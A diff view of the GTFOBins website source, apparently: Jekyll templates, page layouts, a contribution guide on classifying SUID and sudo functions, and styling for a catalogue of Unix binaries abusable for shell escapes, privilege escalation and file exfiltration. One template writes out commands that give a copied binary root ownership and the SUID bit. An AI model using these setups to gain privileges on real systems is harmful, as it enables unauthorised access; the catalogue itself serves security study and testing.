{% assign function_name = function[0] %}
|
||||
{% assign examples = function[1] %}
|
||||
|
||||
<h2 id="{{ function_name }}" class="function-name">
|
||||
{{- site.data.functions[function_name].label -}}
|
||||
</h2>
|
||||
|
||||
{{ site.data.functions[function_name].description | markdownify }}
|
||||
|
||||
{% for example in examples %}
|
||||
|
||||
<div class="example">
|
||||
{{ example.description | markdownify }}
|
||||
|
||||
{% capture code %}
|
||||
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
|
||||
cp $(which {{ bin_name }}) .
|
||||
sudo chown 0 ./{{ bin_name }}
|
||||
sudo chmod +s ./{{ bin_name }}
|
||||
{% endif %}
|
||||
{{ example.code }}
|
||||
{% endcapture %}
|
||||
|
||||
<pre><code>
|
||||
{{- code | strip -}}
|
||||
</code></pre>
|
||||
|
||||
</div>
|
||||
|
||||
{% endfor %}
|
||||
|
||||
{% endfor %}
|
|
@ -0,0 +1,22 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>
|
||||
{{ site.title }}
|
||||
{% if page.url != '/' %}
|
||||
|
|
||||
{% if page.layout == 'bin' %}
|
||||
{{ page.title | downcase }}
|
||||
{% else %}
|
||||
{{ page.title }}
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
</title>
|
||||
<link rel="stylesheet" href="/style.css" type="text/css"/>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
|
||||
</head>
|
||||
<body>
|
||||
{{ content }}
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% include page_title.html title=page.title %}
|
||||
|
||||
{{ content }}
|
|
@ -0,0 +1,45 @@
|
|||
---
|
||||
layout: page
|
||||
title: Contribute
|
||||
---
|
||||
|
||||
## Structure
|
||||
|
||||
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
|
||||
|
||||
[YAML]: http://yaml.org/
|
||||
|
||||
The full syntax is the following:
|
||||
|
||||
```
|
||||
description: Optional description of the binary
|
||||
functions:
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ....
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ...
|
||||
...
|
||||
```
|
||||
|
||||
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
|
||||
|
||||
Feel free to use any file in the `_gtfobins/` folder as an example.
|
||||
|
||||
Pull request process
|
||||
--------------------
|
||||
|
||||
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
|
||||
|
||||
Before sending a pull request of a new binary or function, ensure the following:
|
||||
|
||||
1. Verify the function works on at least one type of modern Unix system.
|
||||
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
|
||||
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
|
||||
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
|
||||
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
|
||||
|
||||
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.
|
|
@ -0,0 +1,8 @@
|
|||
---
|
||||
layout: page
|
||||
title: Functions
|
||||
---
|
||||
|
||||
A binary may support one or more of the following functions:
|
||||
|
||||
{% include functions_description.html %}
|
|
@ -0,0 +1,16 @@
|
|||
---
|
||||
layout: page
|
||||
title: GTFOBins
|
||||
---
|
||||
|
||||
GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
|
||||
|
||||
This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
|
||||
|
||||
The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
|
||||
|
||||
GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
|
||||
|
||||
## List of GTFOBins
|
||||
|
||||
{% include bin_table.html %}
|
|
@ -0,0 +1,117 @@
|
|||
---
|
||||
---
|
||||
|
||||
$accent: #bf0707;
|
||||
$lighter: #fff4f4;
|
||||
$hover: #ff0000;
|
||||
|
||||
// layout
|
||||
|
||||
@media (min-width: 1000px) {
|
||||
body {
|
||||
width: 800px;
|
||||
margin: 0 auto;
|
||||
}
|
||||
}
|
||||
|
||||
// common tags
|
||||
|
||||
body {
|
||||
font-family: sans, sans-serif;
|
||||
}
|
||||
|
||||
code {
|
||||
padding: 0.15em 0.25em;
|
||||
border-radius: 0.25em;
|
||||
color: $accent;
|
||||
background: $lighter;
|
||||
}
|
||||
|
||||
pre {
|
||||
background: $lighter;
|
||||
padding: 1em;
|
||||
overflow-x: auto;
|
||||
|
||||
code {
|
||||
padding: 0;
|
||||
border-radius: 0;
|
||||
}
|
||||
}
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
color: $hover;
|
||||
}
|
||||
|
||||
// fragment targets
|
||||
|
||||
*:target {
|
||||
border-left: 5px solid $accent;
|
||||
padding-left: 5px;
|
||||
}
|
||||
|
||||
// binary list and search
|
||||
|
||||
#bin-search {
|
||||
padding: 0.5em;
|
||||
width: 100%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
#bin-table {
|
||||
width: 100%;
|
||||
|
||||
th, td {
|
||||
padding: 0.2em 1em;
|
||||
}
|
||||
|
||||
th {
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
#search-message {
|
||||
text-align: center;
|
||||
padding: 1em;
|
||||
}
|
||||
}
|
||||
|
||||
// function description
|
||||
|
||||
.function-list {
|
||||
font-size: 0.8rem;
|
||||
list-style: none;
|
||||
padding: 0;
|
||||
margin: 0;
|
||||
|
||||
li {
|
||||
display: inline-block;
|
||||
padding: 0.25em 0.5em;
|
||||
margin: 0.05em 0;
|
||||
border: 1px solid $accent;
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
&:hover, a:hover {
|
||||
color: $hover;
|
||||
border-color: $hover;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// classes
|
||||
|
||||
.bin-name {
|
||||
font-family: monospace;
|
||||
font-size: 1.2rem;
|
||||
}
|
||||
|
||||
.function-name {
|
||||
font-size: 1.4rem;
|
||||
font-weight: bold;
|
||||
}
|
Loading…
Reference in New Issue